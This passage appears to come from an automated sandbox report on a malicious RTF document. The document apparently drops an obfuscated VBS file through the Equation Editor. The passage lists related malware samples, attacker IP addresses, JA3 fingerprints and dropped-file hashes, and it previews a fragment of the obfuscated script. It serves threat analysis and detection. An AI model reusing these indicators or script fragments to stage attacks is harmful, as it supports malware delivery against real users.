                                                • 45.89.247.65
                                                INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                                • 45.89.247.65
                                                Document#.exeGet hashmaliciousRemcosBrowse
                                                • 45.89.247.84
                                                t7A1BhMgJ2.exeGet hashmaliciousRemcosBrowse
                                                • 45.89.247.135
                                                Swift Payment.xlsGet hashmaliciousFormBookBrowse
                                                • 45.89.247.151
                                                aS4XS9m23e.exeGet hashmaliciousRedLineBrowse
                                                • 85.209.133.187
                                                PO-014842-2.xlsGet hashmaliciousFormBookBrowse
                                                • 45.89.247.151
                                                INTERNET-ARCHIVEUSINV_00983.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                Proforma invoices_1.jsGet hashmaliciousUnknownBrowse
                                                • 207.241.227.86
                                                Enquiry.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                • 207.241.227.96
                                                Demande de devis.Quote Request.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                • 207.241.227.86
                                                Orden-de-Compra-OC_17407.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • 207.241.232.154
                                                RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                                • 207.241.224.2
                                                PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.232.154
                                                Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.224.2
                                                CMCSUSxrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                • 45.89.247.65
                                                PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                                • 45.90.89.98
                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtfGet hashmaliciousRemcosBrowse
                                                • 45.89.247.65
                                                INV4092401.docx.docGet hashmaliciousRemcosBrowse
                                                • 45.89.247.65
                                                Document#.exeGet hashmaliciousRemcosBrowse
                                                • 45.89.247.84
                                                t7A1BhMgJ2.exeGet hashmaliciousRemcosBrowse
                                                • 45.89.247.135
                                                Swift Payment.xlsGet hashmaliciousFormBookBrowse
                                                • 45.89.247.151
                                                aS4XS9m23e.exeGet hashmaliciousRedLineBrowse
                                                • 85.209.133.187
                                                PO-014842-2.xlsGet hashmaliciousFormBookBrowse
                                                • 45.89.247.151

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                05af1f5ca1b87cc9cc9b25185115607dINV_00983.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                SWIFT DETAILS-ERROR.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 207.241.227.96
                                                Orden-de-Compra-OC_17407.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                • 207.241.227.96
                                                SecuriteInfo.com.Exploit.CVE-2018-0798.4.26981.24309.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 207.241.227.96
                                                2000 EUR.docGet hashmaliciousSmokeLoaderBrowse
                                                • 207.241.227.96
                                                RFQ_0230909024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                xrrwwstCMd.docxGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.15030.28858.rtfGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                PO FT-151-2024 PETROMAT.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96
                                                Inquiry_0476452.xlsGet hashmaliciousRemcosBrowse
                                                • 207.241.227.96

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4760
                                                Entropy (8bit):4.834060479684549
                                                Encrypted:false
                                                SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):0.34726597513537405
                                                Encrypted:false
                                                SSDEEP:3:Nlll:Nll
                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:@...e...........................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seennewthingsentireworldseethethings[1].tiff

                                                Download File
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):201378
                                                Entropy (8bit):3.847772100519103
                                                Encrypted:false
                                                SSDEEP:3072:iaYYlq9WoCfvvB9Fgt5p/Gw/5Iy76AOJfBsbApxn7J:pYn9WNZ9l6sPn7J
                                                MD5:E586CEE8737A0875953BE251A6B08BE7
                                                SHA1:2C85EE38F519317E7885A1956D2B573D270A4CE4
                                                SHA-256:2320B989A0EEA128BC497E4390B30B4B4AEA61A0B6E1325CE74D4E23D6F751B5
                                                SHA-512:82306269D32E2E91A86ACEBEDC2866CA98400BC5DDF27FB9CE38B65A991693CE597BF5B36E1C10659BB168E6DF9D0E603270A075B2B3CCEAFCC61C4E1CF1E645
                                                Malicious:false
                                                Preview:..L.L.b.Z.u.i.k.i.R.L.e.A.h. .=. .".z.W.L.d.R.f.O.i.L.i.h.G.Q.".....f.x.W.k.A.W.A.p.I.k.W.G.p. .=. .".o.N.p.K.b.e.b.t.g.m.k.L.t.".....b.z.p.o.e.C.k.u.O.W.T.J.B. .=. .".A.l.K.L.c.N.S.P.W.n.L.m.u.".....L.k.U.p.b.e.n.A.u.Z.R.z.a. .=. .".p.K.l.h.K.h.L.U.n.s.b.b.i.".....p.R.p.t.b.L.A.L.p.Z.f.L.f. .=. .".G.U.H.H.a.T.G.L.R.K.G.g.U.".....m.A.W.Z.L.i.j.N.A.N.W.c.W. .=. .".W.k.n.h.W.c.W.K.u.L.b.q.P.".....G.G.i.Z.C.f.n.p.R.o.f.o.t.a.j. .=. .".p.i.G.W.u.K.t.G.W.f.L.W.W.".....Z.W.N.B.Z.i.g.f.k.g.W.O.A. .=. .".Z.k.W.W.H.d.L.L.x.T.i.U.i.".....e.P.A.L.J.v.L.Q.W.K.A.U.j. .=. .".f.K.G.U.t.h.K.s.B.C.b.m.L.".....U.L.c.W.L.T.Z.U.k.W.N.K.n. .=. .".z.a.W.L.h.n.d.U.L.h.L.i.t.".........W.u.G.a.i.c.L.N.f.K.Z.p.L. .=. .".b.p.o.K.i.K.c.h.N.A.b.c.R.".....b.H.G.g.L.R.G.P.u.d.t.i.O. .=. .".h.c.W.K.x.G.b.d.G.L.Z.o.B.".....J.h.d.U.u.l.L.N.s.e.T.W.L. .=. .".o.t.C.U.L.L.L.i.G.Z.Q.Z.I.".....S.W.N.H.e.i.N.h.o.n.e.W.K. .=. .".S.c.h.K.C.v.O.G.t.Q.k.T.K.".....H.B.B.c.O.i.T.h.u.N.Q.L.f. .=. .".b.k.Z.f.o.d.K.p.q.k.p.A.W.".....

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\json[1].json

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                File Type:JSON data
                                                Category:dropped
                                                Size (bytes):962
                                                Entropy (8bit):5.013811273052389
                                                Encrypted:false
                                                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                                                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                                                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                                                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                                                Malicious:false
                                                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{0230E32B-C301-4FA6-B113-F550CB612E0B}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):9216
                                                Entropy (8bit):5.016591174521353
                                                Encrypted:false
                                                SSDEEP:96:8uWGMP9X6WYN0OIsdDugBWomSMgbEANX6WYz0OIsdDugBWomS:8uuPJgtIE6BSnZCtIE6BS
                                                MD5:24287C2FA4F766074FEFC1EE2468D2A6
                                                SHA1:D50CC8339067F6BCAC20243ECE613EDA68010584
                                                SHA-256:2F80C70BD530609C9D78F8D972AB3351442FE5687DC5F2CAA223781AD3923385
                                                SHA-512:998802A73D10D588B8217ECE193973B553BF2C930547510073640795BA48D6EE0257E79B707A56BFC78DBA250D65A35E4A9A0DE744BFAB21752A5DFCBFE5D740
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0F731DFC-620E-497E-A603-6109842A11F2}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1536
                                                Entropy (8bit):1.357318797251612
                                                Encrypted:false
                                                SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlb2:IiiiiiiiiifdLloZQc8++lsJe1Mz1
                                                MD5:60AC920EB69959816D302A9FA841971B
                                                SHA1:3272B68FF94A99A33AD8FB64FF39FE3BD7A20FDB
                                                SHA-256:E4F569714EFF922E7F637001ECCBA6512A93DD45295F48B0F7E164ECA4199E37
                                                SHA-512:B7A99C192BC754AC2DB9429468A9E4908384CC7C64807C85C52D4E1F555057B85A6F745280AAAC24A8A5E0F70BE3254AA5A880ABE72A837AA4CBD018493AEA39
                                                Malicious:false
                                                Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E286D4CB-AB0E-4033-BF79-89280EE65D11}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):14368
                                                Entropy (8bit):3.6025182679098706
                                                Encrypted:false
                                                SSDEEP:384:IkUc0n1APGHHfW8lzxvdvQ3ys3lhMZ42IscAyGBX7:Ify+HeKd3eD1yBX7
                                                MD5:E8F75CB741A61768884DFCC773415EC2
                                                SHA1:F3A3FA89ED29996798B151B1C86CC0CF9D3EBB9E
                                                SHA-256:9E49E4DB6E0A7D6DA6460A3846029CA449C14A38B566771AC783A12C89262EC2
                                                SHA-512:FA238609FE141E28709D781345D2E04D1B9E8E9AD7797C06F38B79107E42E865058EB39B48FA43D8E918F028F57709C46795B20FACFA0222B9F9205C41BDC0E3
                                                Malicious:false
                                                Preview:....................0.4.7.3.1.8.1.7.<.^.3.?.!.0.6.].$.+.?.).?.%.?.5.4.[.;.5.>.(.#.!.8.(...6.:.!.5._.`.&.[.`.=.).%.2.%.`.&.?.?.7.8.[.4.-.3.?./...-.<.).|.;.8.5.].>.$.3.(.;.?.7.+.>._.%.%...,.;.5.7.;.?.[.;.%.8...0...<.?.7.5.@...'.5.(.8.$.2.?.6.=.#.).7.'.4.(.|.:.9.1.,.,./.+.).6.&.:.4.&.'.5.6.%.?.7.?.?.=.?...*.].=.9.?.4.5.%._.7.2.).$.-.@.3.#.$.[.(.1.?.?...0.@.....).%.>.*.2.1./...?.5.?.@.:._.5.|...!.2.@.@.7.;.?.&.$.).=.&.?.,./.%.2.:.6.?.4.+.[.,.[.+.:.).-.$.(.).].*.?.7.<.|.8./..._.8.9.-.#.~.(.5...+.?.9.7.%.>...?.....1.?.@.$.^.1.|.9.#...[.&.4.5.(.%.2.%.:.0.?.5.%.8.:.'.<...^._.?.<.:.6.6.-.$.~...&.*./.^.?.6.,.9.[.?.:.*.5...%.`.,.7.9.?.3.?.1.0.?.>.$.?...6.?.3.3.&.1.^.>.=.*.:.?.?./.4.8.).?.:.?.?._.$.8.`.[.8.:.`.0.9.0.?./.%...>...%.&.?.'.?.@.?.,.?.7._.~.(.1.7.6.%.3.`.|.?.5.`.!.0.<.(...(.7.,.4.%.).$...@.?.'.0.&...,.#.9...$.:.`.;.?.?.*.*.6.~.6.?.@.4.#.;.?...?.?.(.8.'...:._.&.4.5.,.[.;...8.[.%.7.:.!.~.%.6.?.4.<.@.9.).&.?.^.6./.].~.?.6...&.'.8.'._.6.0.(.(.4.<.!.4.?.8.%.0.1.~.'.1.4.....;.9._.;.;.!.?...6.

                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA4CB5E2-DBE3-4260-9610-CCFF5325F098}.tmp

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1024
                                                Entropy (8bit):0.05390218305374581
                                                Encrypted:false
                                                SSDEEP:3:ol3lYdn:4Wn
                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                Malicious:false
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\4lfj4sg0.zw3.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\loat\logs.dat

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):422
                                                Entropy (8bit):7.501823841517196
                                                Encrypted:false
                                                SSDEEP:12:sx9ha/JXXf2a3XwLCELfvq/7mIfqb9Rewqfrbj:A9iXv2a3X+zSzTeAz
                                                MD5:093662983B41A60A68ECD4E8373032CB
                                                SHA1:2FDB8E1FC22C44A5F0F0F2A7102AEF67218D3CA1
                                                SHA-256:5F13C65845BCCDBA8B629DE0AE1F0CC796AA92871047BE33139736642DE48B61
                                                SHA-512:7F91FBFE1E1F11045E3B90E8EA58F6A6B8C1FC1DFC9B757226C0C2D99BBB3AC395D7088CBAFB424F34E0310799443428FFB7980288EF7B64C9EDE0EFD5128D94
                                                Malicious:false
                                                Preview:.=.........7.@..OL.X.y.v..$..C..5....IZn..E....4[.......r.I.Y..5f.'...>.LC.Z..?r.`kH...E;1M..yc8..d.8t3+ ......4.....Re.../.x......w.i.5.5/.R.....'.pk..@]A...$U.....u..Un.x.yF.|oX.?...\.0..r9..:.`..!DO.I.#.'.<.......k...(..........b.wd.~k...S@..mPc.QT.............8.w...w..-.v...`) y.y..4..|(H..u..+.....z.4.-.0. ..\.{....!...l.S..IG8Cx..P..-.fo.N........{...... ..mv.r.......}......Dwc.F....

                                                C:\Users\user\AppData\Local\Temp\ndebpy4o.jcz.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\r5trqahy.yze.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1

                                                C:\Users\user\AppData\Local\Temp\xc5gwbgy.qd0.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Generic INItialization configuration [folders]
                                                Category:dropped
                                                Size (bytes):45
                                                Entropy (8bit):4.391635874011299
                                                Encrypted:false
                                                SSDEEP:3:HW+JYm4xyJYv:HfRC
                                                MD5:D240725AD9D93A0E089CCB91CCF5A50A
                                                SHA1:3A40E3A01A78C2CBB0743793854366FD50415E25
                                                SHA-256:C778C9755842E662C40A77D9F47476F094DD4FDBA01D7D316D95DE9DE5461EC4
                                                SHA-512:84A4C492D53CF94F89ADA6A1C13AF4419112A2879EBAB093EABB4B6FB328A215D7E86BE4BA8B1A82AD8ACDDE0A4DE089F6B2F933B16C68245EF116B6DCAC46E7
                                                Malicious:false
                                                Preview:[misc]..xnHel.LNK=0..[folders]..xnHel.LNK=0..

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\xnHel.LNK

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:18 2023, mtime=Fri Aug 11 15:42:18 2023, atime=Wed Sep 11 17:22:11 2024, length=116087, window=hide
                                                Category:dropped
                                                Size (bytes):985
                                                Entropy (8bit):4.523501837731987
                                                Encrypted:false
                                                SSDEEP:12:80tPVxRgXg/XAlCPCHaXPMB1lzB/hMjX+WUbbjbicvb3MDtZ3YilMMEpxRljKGwx:80Zn/XT/MFIKbbKeIDv3qHwq57u
                                                MD5:C8E1BA257FA4543968DCCA096AA5B767
                                                SHA1:2C42381080814FCE92017B06F3B1DA799F3FE6C3
                                                SHA-256:B169210A31E96F43AE31515EF07CEF8F46C4827F2A598030B4FF3E1115E18515
                                                SHA-512:D95BBEE918192BF3FE37D89CA8DB0AD1D6070963B6A5EB414AF8ED8A049AAB0F75FF5C73FBE132FDE34F281F7B31A471FF41AA0D884CABE498F1F73C4DBD8403
                                                Malicious:false
                                                Preview:L..................F.... .......r.......r....l#.w...w............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....+Y...user.8......QK.X+Y.*...&=....U...............A.l.b.u.s.....z.1......WK...Desktop.d......QK.X.WK.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....X.2.w...+Y. .xnHel.rtf.@.......WJ..WJ.*.........................x.n.H.e.l...r.t.f.......s...............-...8...[............?J......C:\Users\..#...................\\579569\Users.user\Desktop\xnHel.rtf. .....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.x.n.H.e.l...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......579569..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.503835550707526
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyVFuAGlYViuWCHlkkAi/lln:vdsCkWteuAyYLvAyll
                                                MD5:5A248DD99654CB4793F2457BEE4E69C1
                                                SHA1:9DA63BD05ECA3E441B135C705B425B562E5CA494
                                                SHA-256:73FA49E819EEA9D2CA5024559E4730AC8EE873B526EA79B35082C2ED6E644C0A
                                                SHA-512:1FDB3C71240EBA121A74E2F770F17E30DB67D5812445A7FFB8AA85BE224BA36A5F3CCF818D84EA44579815F5F065AC911D2016F4DC1E4FE64073B3AF4CED3EBB
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS

                                                Download File
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):201378
                                                Entropy (8bit):3.847772100519103
                                                Encrypted:false
                                                SSDEEP:3072:iaYYlq9WoCfvvB9Fgt5p/Gw/5Iy76AOJfBsbApxn7J:pYn9WNZ9l6sPn7J
                                                MD5:E586CEE8737A0875953BE251A6B08BE7
                                                SHA1:2C85EE38F519317E7885A1956D2B573D270A4CE4
                                                SHA-256:2320B989A0EEA128BC497E4390B30B4B4AEA61A0B6E1325CE74D4E23D6F751B5
                                                SHA-512:82306269D32E2E91A86ACEBEDC2866CA98400BC5DDF27FB9CE38B65A991693CE597BF5B36E1C10659BB168E6DF9D0E603270A075B2B3CCEAFCC61C4E1CF1E645
                                                Malicious:true
                                                Preview:..L.L.b.Z.u.i.k.i.R.L.e.A.h. .=. .".z.W.L.d.R.f.O.i.L.i.h.G.Q.".....f.x.W.k.A.W.A.p.I.k.W.G.p. .=. .".o.N.p.K.b.e.b.t.g.m.k.L.t.".....b.z.p.o.e.C.k.u.O.W.T.J.B. .=. .".A.l.K.L.c.N.S.P.W.n.L.m.u.".....L.k.U.p.b.e.n.A.u.Z.R.z.a. .=. .".p.K.l.h.K.h.L.U.n.s.b.b.i.".....p.R.p.t.b.L.A.L.p.Z.f.L.f. .=. .".G.U.H.H.a.T.G.L.R.K.G.g.U.".....m.A.W.Z.L.i.j.N.A.N.W.c.W. .=. .".W.k.n.h.W.c.W.K.u.L.b.q.P.".....G.G.i.Z.C.f.n.p.R.o.f.o.t.a.j. .=. .".p.i.G.W.u.K.t.G.W.f.L.W.W.".....Z.W.N.B.Z.i.g.f.k.g.W.O.A. .=. .".Z.k.W.W.H.d.L.L.x.T.i.U.i.".....e.P.A.L.J.v.L.Q.W.K.A.U.j. .=. .".f.K.G.U.t.h.K.s.B.C.b.m.L.".....U.L.c.W.L.T.Z.U.k.W.N.K.n. .=. .".z.a.W.L.h.n.d.U.L.h.L.i.t.".........W.u.G.a.i.c.L.N.f.K.Z.p.L. .=. .".b.p.o.K.i.K.c.h.N.A.b.c.R.".....b.H.G.g.L.R.G.P.u.d.t.i.O. .=. .".h.c.W.K.x.G.b.d.G.L.Z.o.B.".....J.h.d.U.u.l.L.N.s.e.T.W.L. .=. .".o.t.C.U.L.L.L.i.G.Z.Q.Z.I.".....S.W.N.H.e.i.N.h.o.n.e.W.K. .=. .".S.c.h.K.C.v.O.G.t.Q.k.T.K.".....H.B.B.c.O.i.T.h.u.N.Q.L.f. .=. .".b.k.Z.f.o.d.K.p.q.k.p.A.W.".....

                                                C:\Users\user\Desktop\xnHel.rtf (copy)

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                Category:dropped
                                                Size (bytes):53991
                                                Entropy (8bit):5.278517042525491
                                                Encrypted:false
                                                SSDEEP:384:323tHbrN79ozVzEFH3WZ4YEw9KNrNz/wGvXpWDWOsBbOc++f6PsdeJ6ot7oQT9Az:323b3WZHqwGv5OcJRolx2AhAZqCD
                                                MD5:F3E54D580A9F92666E29A8F90DD80B9E
